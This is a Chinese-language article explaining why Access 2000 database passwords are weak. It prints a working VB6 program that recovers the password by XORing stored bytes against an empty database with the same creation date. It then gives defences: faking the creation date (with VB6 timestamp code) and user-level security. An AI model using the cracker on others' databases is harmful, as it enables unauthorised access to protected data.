如果你過分信任Access2000數(shù)據(jù)庫的密碼保護(hù)，你可能會因此而蒙受損失。這是因為Access 2000的數(shù)據(jù)庫級密碼并不安全，相反它很脆弱，甚至下面這段非常小的程序就可以攻破它：

程序一(VB6)：Access 2000密碼破譯

Private Sub Command1_Click()

Const Offset = &H43 文件偏移地址：Access數(shù)據(jù)庫從此處開始存放加密密碼

Dim bEmpty(1 To 2) As Byte, bPass(1 To 2) As Byte

Dim i As Integer, PasswordAs String

打開一個空數(shù)據(jù)庫作為參照

Open "D:/VB6_Test/MDB_Password/New_Empty_DB.mdb" For Binary As #1

打開被密碼保護(hù)的數(shù)據(jù)庫

Open "D:/VB6_Test/MDB_Password/Pass_Protected_DB.mdb" For Binary As #2

Seek #1, Offset

Seek #2, Offset

For i = 1 To 20 ' Access 2000 數(shù)據(jù)庫密碼最長允許20位

Get #1, , bEmpty ' 其中每位密碼占兩個字節(jié)

Get #2, , bPass ' 一個漢字也僅是一位密碼，占兩個字節(jié)

If (bEmpty(1) Xor bPass(1)) <> 0 Then

Password = Password + Chr(bEmpty(1) Xor bPass(1)) ' 將密碼解密

End If

Next

Close 1, 2

MsgBox "Password:" + Password ' 顯示密碼

End Sub

一、深入分析

上述程序成功的關(guān)鍵是使用了一個空數(shù)據(jù)庫(New_Empty_DB.mdb)。該數(shù)據(jù)庫的創(chuàng)建日期必須與被密碼保護(hù)的數(shù)據(jù)庫(Pass_Protected_DB.mdb)相一致。 換句話說，Access 2000 僅僅是使用“數(shù)據(jù)庫創(chuàng)建日期”來加密用戶密碼。

應(yīng)注意的是：上面的“創(chuàng)建日期”只是操作系統(tǒng)級的，也就是 Windows記錄在文件夾目錄里的信息(根據(jù)文件名的長短，每個文件在目錄里占用至少32個字節(jié)，包括：文件名、屬性、文件大小、首蔟號、創(chuàng)建時間、修改時間和訪問時間等)。

Access 2000 在數(shù)據(jù)庫中也記錄了該數(shù)據(jù)庫的“創(chuàng)建日期”。加密數(shù)據(jù)庫密碼的正是數(shù)據(jù)庫內(nèi)部記錄的這個“創(chuàng)建日期”。該日期只有在數(shù)據(jù)庫被成功打開后才能看到。但在一般情況下，操作系統(tǒng)級的以及數(shù)據(jù)庫內(nèi)保存的“創(chuàng)建日期”是完全一樣的，因此這為破譯者提供了方便。

上述程序中還有一點需要說明：為簡明起見，解密密碼時僅處理了雙字節(jié)的首字節(jié)，因此它僅對非漢字密碼有效。若要解密漢字密碼，須對雙字節(jié)均做處理。

二、防范措施

1、隱藏“創(chuàng)建日期”

從上面的分析可以看出，既然“創(chuàng)建日期”是破譯的關(guān)鍵，那么我們應(yīng)“對癥下藥”，將真實的“創(chuàng)建日期”隱藏起來。

第一步，創(chuàng)建數(shù)據(jù)庫時，使用一個“不可思議的、別人不易猜測”的日期。做法為：修改 Windows系統(tǒng)日期，例如改為2026年05月15日，創(chuàng)建數(shù)據(jù)庫后再將系統(tǒng)日期改回。這個“不可思議”的日期即為該數(shù)據(jù)庫的真實“創(chuàng)建日期”。

第二步，修改操作系統(tǒng)級的“創(chuàng)建日期”。上述第一步完成后，該數(shù)據(jù)庫在操作系統(tǒng)級的創(chuàng)建日期也是2026年05月15日，必須加以修改，以達(dá)到隱藏真實創(chuàng)建日期的目的。修改操作系統(tǒng)級的“創(chuàng)建日期”可以由下面的程序二完成。

程序二(VB6)：修改文件在操作系統(tǒng)級的“創(chuàng)建日期”

Private Type FILETIME

dwLowDateTime As Long

dwHighDateTime As Long

End Type

Private Type SYSTEMTIME

wYear As Integer

wMonth As Integer

wDayOfWeek As Integer

wDay As Integer

wHour As Integer

wMinute As Integer

wSecond As Integer

wMilliseconds As Integer

End Type

Private Const GENERIC_WRITE = &H40000000

Private Const OPEN_EXISTING = 3

Private Const FILE_SHARE_READ = &H1

Private Const FILE_SHARE_WRITE = &H2

Private Declare Function SetFileTimeWrite Lib "kernel32" Alias _

"SetFileTime" (ByVal hFile As Long, lpCreateTime As FILETIME, _

ByVal NullP As Long, ByVal NullP2 As Long) As Long

Private Declare Function SystemTimeToFileTime Lib "kernel32" _

(lpSystemTime As SYSTEMTIME, lpFileTime As FILETIME) As Long

Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" _

(ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal _

dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal _

dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, _

ByVal hTemplateFile As Long) As Long

Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) _

As Long

Private Declare Function LocalFileTimeToFileTime Lib "kernel32" _

(lpLocalFileTime As FILETIME, lpFileTime As FILETIME) As Long

Private Sub Command1_Click()

Dim Year As Integer, Month As Integer, Day As Integer

Dim Hour As Integer, Minute As Integer, Second As Integer

Dim TimeStamp As Variant, Filename As String, X As Integer

Year = 2001: Month = 3: Day = 13 ' 準(zhǔn)備設(shè)定的“創(chuàng)建日期”

Hour = 12: Minute = 0: Second = 26

TimeStamp = DateSerial(Year, Month, Day) + TimeSerial(Hour, Minute, Second)

Filename = "D:/VB6_Test/MDB_Password/Pass_Protected_DB.mdb" ' 目標(biāo)文件名

X = ModifyFileStamp(Filename, TimeStamp)

End Sub

Function ModifyFileStamp(Filename As String, TimeStamp As Variant) As Integer

Dim X As Long, Handle As Long, System_Time As SYSTEMTIME

Dim File_Time As FILETIME, Local_Time As FILETIME

System_Time.wYear = Year(TimeStamp): System_Time.wMonth = Month(TimeStamp)

System_Time.wDay = Day(TimeStamp)

System_Time.wDayOfWeek = Weekday(TimeStamp) - 1

System_Time.wHour = Hour(TimeStamp): System_Time.wSecond = Second(TimeStamp)

System_Time.wMilliseconds = 0

X = SystemTimeToFileTime(System_Time, Local_Time)

X = LocalFileTimeToFileTime(Local_Time, File_Time) ' 轉(zhuǎn)換成可用的類型

Handle = CreateFile(Filename, GENERIC_WRITE, FILE_SHARE_READ Or _

FILE_SHARE_WRITE, ByVal 0&, OPEN_EXISTING, 0, 0) ' 打開文件

X = SetFileTimeWrite(Handle, File_Time, ByVal 0&, ByVal 0&) ' 設(shè)置日期

CloseHandle Handle ' 關(guān)閉文件

End Function

圖三顯示的是數(shù)據(jù)庫的真實“創(chuàng)建日期”以及經(jīng)程序二偽裝的操作系統(tǒng)級的“假象”日期。

可以看出，隱藏“創(chuàng)建日期”的方法對破譯者來說只是增大了破譯的工作量，增加了破解試驗的次數(shù)。只有將該方法與下述的“方法二”相結(jié)合，才能達(dá)到“既治標(biāo)又治本”的效果。不過在一般的情況下“方法一”已夠用，因為如果破譯者起始使用的測試日期與最終的真實日期相差百年，他需要付出數(shù)萬次的努力!

2、使用用戶級安全機(jī)制

通過設(shè)置不同的用戶帳號和組帳號對數(shù)據(jù)庫中的各種資源進(jìn)行權(quán)限管理。這種加強(qiáng)了的安全機(jī)制雖然給日常使用(尤其是單用戶使用)帶來了不便，但在有安全隱患的地方依然有設(shè)置的必要。

設(shè)置各種帳號及相應(yīng)權(quán)限的簡單方法是使用“設(shè)置安全機(jī)制向?qū)?rdquo;(見圖四)。圖四還顯示了安全機(jī)制啟動后要求用戶登錄的畫面。

三、結(jié)論

所謂“道高一尺魔高一丈”，因為這世上并沒有絕對的安全。上述方法一的目的是提高破譯的成本以達(dá)到常人難以接受的程度;而方法二的初衷是增加密碼的數(shù)量。兩種方法的結(jié)合足以使破譯者望而卻步。不過這并不意味著百分之百的安全。但從思想上提高安全意識，防患于未然，這畢竟是正確的選擇。